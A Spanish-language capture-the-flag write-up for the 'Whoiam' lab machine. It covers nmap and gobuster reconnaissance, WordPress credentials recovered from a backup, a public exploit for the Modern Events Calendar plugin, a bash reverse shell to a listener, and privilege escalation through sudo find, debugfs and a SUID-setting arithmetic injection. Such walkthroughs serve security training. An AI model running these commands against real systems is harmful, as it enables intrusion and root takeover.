Whoiam

✍️ Autor: Pylon🔍 Dificultad: Fácil 📅 Fecha de creación: 09/06/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.18.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.18.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 80 perteneciente al servicio HTTP está abierto por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p80 -v 172.18.0.2

para que nos proporcione más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web llamada Whoiam.

También al realizar el escaneo y al entrar en el código fuente vemos que hay un WordPress.

Ahora buscaremos directorios y archivos con la herramienta Gobuster a través de:

gobuster dir -u http://172.18.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,php,txt,xml

Nos llamada la atención el directorio /backups por lo que revisamos.

Nos lo descargamos y descomprimimos y contiene un usuario y su contraseña.

Nos logueamos con esas credenciales en WordPress.

🚀 EXPLOTACIÓN

Vemos los plugins y hay uno que nos llama la atención.

Buscamos si contiene algún exploit.

searchsploit modern events calendar

Nos descargamos el segundo exploit.

searchsploit -m php/webapps/50082.py

Ejecutamos el siguiente comando para crear una shell en el navegador.

python 50082.py -T 172.20.0.2 -P 80 -U / -u developer -p 2wmy3KrGDRD%RsA7Ty5n71L^

Entramos en la shell.

Nos enviamos una Reverse Shell.

/bin/bash -c "bash -i >& /dev/tcp/172.20.0.1/443 0>&1"

Nos ponemos en escucha.

nc -nvlp 443

Hacemos el tratamiento de la TTY para trabajar más cómodos.

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar.

Tenemos permisos SUDO con el usuario rafa con find revisamos esta página.

sudo -u rafa /usr/bin/find . -exec /bin/sh \; -quit

Tenemos permisos SUDO con el usuario rubén con debugfs revisamos esta página.

sudo -u ruben /usr/sbin/debugfs
! /bin/sh

El scrip verifica si el número ingresado es 42 para devolver "Correct". Aprovechando esto, podemos modificar el script para que establezca el bit SUID en /bin/bash. Esto permitirá que cualquier usuario que ejecute /bin/bash obtenga privilegios de root.

prueba[$(chmod u+s /bin/bash >&2)]+42
bash -p
PreviousWhereIsMyWebShellNextWinterfell

Last updated

Was this helpful?